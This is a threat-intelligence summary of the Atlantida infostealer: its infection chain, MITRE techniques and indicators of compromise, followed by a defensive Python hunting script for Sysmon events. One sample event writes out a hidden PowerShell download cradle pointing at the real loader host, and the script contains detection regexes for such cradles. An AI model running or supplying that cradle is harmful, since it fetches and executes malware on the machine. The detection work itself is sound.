Whispers of Atlantida: Safeguarding Your Digital Treasure | Rapid7 Blog

Rapid7 exposed Atlantida, a new stealer delivered via a compromised site that tricks users into downloading a malicious file, then uses evasion techniques like reflective loading and injection. It steals browser data, cryptocurrency wallet data, Telegram desktop data, captures screens, and gathers hardware information before exfiltrating via a hardcoded C2 server. #Atlantida #Donut #RegAsm #PowerShell

Keypoints

  • Atlantida is a newly observed stealer, reported by Rapid7, delivered from a compromised website as a malicious .hta file (an HTML Application executed by mshta.exe).
  • It employs evasion techniques, including reflective loading and process injection, to load the stealer in memory.
  • The toolset includes a three-stage in-memory loading chain that downloads a .NET downloader and uses Donut for in-memory execution.
  • Stage 3 loads the Atlantida stealer, which enumerates data from browsers, cryptocurrency wallets, Telegram data, Steam, FileZilla, and more.
  • Atlantida collects screen captures, hardware information, and text files from Desktop, then exfiltrates data via a C2 channel (though no data was sent in this instance).
  • Targeted data includes browser credentials, wallet data, and extensions data (ext IDs) from Chrome-based browsers and several wallet extensions listed in the article.

MITRE Techniques

  • [T1204.002] User Execution: Malicious File – “A user downloads and executes malicious .hta file”
  • [T1059.005] Command and Scripting Interpreter: Visual Basic – “.hta contains malicious VBScript function”
  • [T1059.001] Command and Scripting Interpreter: PowerShell – “VBScript executes powershell to download powershell script”
  • [T1105] Ingress Tool Transfer – “A powershell script downloads an additional .Net Loader”
  • [T1620] Reflective Code Loading – “Powershell script executed the loader reflectively”
  • [T1055] Process Injection – “The .Net loader injects into RegAsm.exe process”
  • [T1555.003] Credentials from Web Browsers – “Atlantida steals stored browser data such as passwords, cookies, tokens, credit cards and autofills”
  • [T1555] Credentials from Password Stores – “Atlantida steals offline cryptocurrency wallets data, and other software data”
  • [T1082] System Information Discovery – “Atlantida collects victim’s hardware information”
  • [T1113] Screen Capture – “Atlantida captures victim’s screen”
  • [T1041] Exfiltration Over C2 Channel – “Atlantida exfiltrates all collected data”

Indicators of Compromise

  • [File Hash] Malicious artifacts – ReadEra_v1.4.2.hta (67b8776b9d8f581173bcb471e91ff1701cafbc92aaed858fe3cb26a31dd6a6d8) and AtlantidaStealer.exe (b4f4d51431c4e3f7aeb01057dc851454cff4e64d16c05d9da12dfb428715d130)
  • [URL] Malicious PowerShell download links – http://166.1.160[.]10/loader.txt, http://166.1.160[.]10/www.bin
  • [File Hash] Stored payloads – http://166.1.160[.]10/www_c.bin (f935143dba2fb65eef931c1dac74a740e58e9e911a13457f4cfa4c73a0c673b3)
  • [File Hash] Donut/loader hashes – http://166.1.160[.]10/www.bin (350216884486d1fafbd60e1d9c87c48149b058e4fab6b9a2a5cd7ea67ab250a0)
  • [IP] Command and control server – 45.144.232[.]99
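To turn the technique list and the indicators above into something a SOC can actually run, here is an added hunting script (it is not Rapid7's code and is not part of the original post). It walks Sysmon-style process-creation (ID 1), network-connection (ID 3) and file-stream-hash (ID 15) events and flags the chain this report describes: mshta.exe executing an .hta, PowerShell spawned by mshta.exe with a download cradle that points at the loader host, RegAsm.exe spawned by PowerShell, RegAsm.exe connecting to the C2 address, and any file whose SHA-256 matches the listed hashes. The event dictionaries are constructed to resemble Sysmon fields and are not real telemetry; the rule names, field names and the benign control events are this example's own assumptions.

```python
import ntpath
import re

# Indicators copied from the report above: SHA-256 hashes, loader host, C2 IP.
IOC_SHA256 = {
    "67b8776b9d8f581173bcb471e91ff1701cafbc92aaed858fe3cb26a31dd6a6d8",  # ReadEra_v1.4.2.hta
    "b4f4d51431c4e3f7aeb01057dc851454cff4e64d16c05d9da12dfb428715d130",  # AtlantidaStealer.exe
    "f935143dba2fb65eef931c1dac74a740e58e9e911a13457f4cfa4c73a0c673b3",  # www_c.bin
    "350216884486d1fafbd60e1d9c87c48149b058e4fab6b9a2a5cd7ea67ab250a0",  # www.bin
}
IOC_DOWNLOAD_HOSTS = {"166.1.160.10"}
IOC_C2_IPS = {"45.144.232.99"}

# Common PowerShell download-cradle idioms and a crude URL-host extractor.
CRADLE_RE = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-expression|\biex\b)",
    re.IGNORECASE)
URL_HOST_RE = re.compile(r"https?://([^/\s'\"]+)", re.IGNORECASE)
PS = ("powershell.exe", "pwsh.exe")


def _base(path):
    """Lower-cased file name of a Windows path ('' if missing)."""
    return ntpath.basename(path or "").lower()


def _sha256(hashes_field):
    """Pull the SHA-256 out of Sysmon's 'SHA256=...,MD5=...' Hashes field."""
    for part in (hashes_field or "").split(","):
        key, _, value = part.partition("=")
        if key.strip().upper() == "SHA256":
            return value.strip().lower()
    return None


def hunt(events):
    """Return findings as (rule_name, attack_id, event_index) tuples."""
    findings = []
    for i, ev in enumerate(events):
        eid, cmd = ev.get("EventID"), ev.get("CommandLine", "")
        image, parent = _base(ev.get("Image")), _base(ev.get("ParentImage"))

        if eid == 1:
            # User execution: mshta.exe handed an .hta (T1204.002).
            if image == "mshta.exe" and ".hta" in cmd.lower():
                findings.append(("mshta_runs_hta", "T1204.002", i))
            # The .hta's VBScript launches PowerShell (T1059.001 child of T1059.005).
            if parent == "mshta.exe" and image in PS:
                findings.append(("mshta_spawns_powershell", "T1059.001", i))
            # Download cradle (T1105); promoted when the host is a known IoC.
            if image in PS and CRADLE_RE.search(cmd):
                hosts = {h.lower() for h in URL_HOST_RE.findall(cmd)}
                rule = "ps_download_cradle_ioc_host" if hosts & IOC_DOWNLOAD_HOSTS else "ps_download_cradle"
                findings.append((rule, "T1105", i))
            # RegAsm.exe started by PowerShell: the injection host from the report (T1055).
            if image == "regasm.exe" and parent in PS:
                findings.append(("powershell_spawns_regasm", "T1055", i))

        if eid == 3 and image == "regasm.exe":
            # RegAsm.exe registers .NET assemblies; it has no reason to reach the
            # internet.  Any egress is suspicious, the C2 IP is a confirmed hit (T1041).
            dst = ev.get("DestinationIp", "")
            rule = "regasm_c2_ioc" if dst in IOC_C2_IPS else "regasm_network_egress"
            findings.append((rule, "T1041", i))

        if eid in (1, 7, 15) and _sha256(ev.get("Hashes")) in IOC_SHA256:
            findings.append(("ioc_sha256_match", "T1204.002", i))
    return findings


# Constructed sample events in Sysmon field style (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe", "Hashes": "SHA256=" + "0" * 64},                        # benign
    {"EventID": 15, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "TargetFilename": r"C:\Users\alice\Downloads\ReadEra_v1.4.2.hta",
     "Hashes": "SHA256=67b8776b9d8f581173bcb471e91ff1701cafbc92aaed858fe3cb26a31dd6a6d8"},  # download
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Users\alice\Downloads\ReadEra_v1.4.2.hta"',
     "Hashes": "SHA256=" + "1" * 64},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://166.1.160.10/loader.txt')\"",
     "Hashes": "SHA256=" + "2" * 64},
    {"EventID": 1, "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "RegAsm.exe", "Hashes": "SHA256=" + "3" * 64},
    {"EventID": 3, "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "DestinationIp": "45.144.232.99", "DestinationPort": 443},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -c \"Invoke-WebRequest http://intranet.corp/tools.zip -OutFile t.zip\"",
     "Hashes": "SHA256=" + "4" * 64},                                                       # admin, weak signal only
]

if __name__ == "__main__":
    for rule, technique, idx in hunt(SAMPLE_EVENTS):
        print(f"event[{idx}] {technique:<10} {rule}")
```

The rules are deliberately tiered: the last sample event (an administrator's Invoke-WebRequest against an internal host) still fires the generic cradle rule, which on its own is noisy, while mshta.exe parenting PowerShell, PowerShell parenting RegAsm.exe, RegAsm.exe egress and any hash or IP match are high-confidence on their own and, seen in sequence on one host, reconstruct the whole chain in the MITRE list above. The hashes only help against this exact sample set; the behavioural rules are what survive the next rebuild.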

Read more: https://www.rapid7.com/blog/post/2024/01/17/whispers-of-atlantida-safeguarding-your-digital-treasure/